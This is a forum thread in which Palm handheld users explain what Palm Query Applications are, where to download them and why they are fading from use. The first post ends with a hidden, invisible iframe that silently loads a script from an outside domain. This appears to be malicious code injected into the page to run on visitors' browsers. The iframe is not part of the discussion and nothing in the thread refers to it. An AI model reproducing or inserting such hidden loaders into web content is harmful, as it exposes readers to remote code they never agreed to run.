+ Reply to Thread

Thread: FAQ about PQA

FAQ about PQA

I know that I'll probably be told I should have used the search but I tried and could not find an easy answer ... what on earth are PQA's and how would I make use of them. Where would I find them? (Tucows? PalmGear?) Which ones are a MUST HAVE? I have the 7135 on Verizon and have their 400 minutes with Express Network but surfing the net directly even at that speed eats up the minutes quickly and is slow when you are used to a DSL connection that tops 500kbs because I am close to the base station. The PQAs seem great by what people say but having no prior knowledge of them I am unable to make sense of the threads I have seen about them. I figured maybe a FAQ with a how to would be helpful. Plesae help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Well, PQAs are Palm Query Application, if I remember correctly, they are apps, which are customised to retrieve a certain kind of info for example, my bank NetBank has one so I can access my account info, American Airlines has one for aqccessing timetables, etc, I have one that retrieves Cocktail/drink recipes, as well as one that download's "Deep Thoughts" by Jack Handey (if you're an SNL fan, you know what I'm talking about. Mapblast has one for getting directions. Basically, you could call them little customized browsers, and since mostly they have no graphics, they are relatively fast. You can find them at palmgear, handango, palm.com, at company sites, for example aa.com, mapblast.com, ebay.com, just about any site that has palm wireless software. Hope this helps.

Jorge

It's a small web page that queries specific information from teh web. It allows faster information retreval by having the web page native on the handheld already. All it need is the requested data.

Mod-Blog's SmartPhone Correspondent
    A PQA is essentially compressed HTML presented as an icon on your Apps screen for easy viewing. Any static web page can be made into a PQA and any PQA can then link out to any site on the web (static or dynamic).

In other words, it is just an easy way to provide a small front-end to a website and keeps you from having to keep a separate web browser on your Palm. You must have internet connectivity to use them.

The site I usually use to get PQAs is PalmGear, and THIS will get you directly to their PQA section.

Be aware that PQAs were very popular a few years back and have fallen somewhat out of favor as the Wireless Palms failed and Palm Web browsers got better and better. Some PQAs offered for sites no longer connect to anywhere or only to an older version of a website.

Hope this is helpful.

Thank you for all the help. I finally got some to work. I think part of the problem in the past was that I was using Launch'Em as my application launcher and you have to adjust some of the settings to get the PQAs to show. That is too bad to hear that they are beginning to fade out. You have to have quite a bit of patience to load a full page even on EN (not to mention with the plan I have the minutes get eaten up fast) and not too many places seem to have mobil sites yet. At least not that I could find.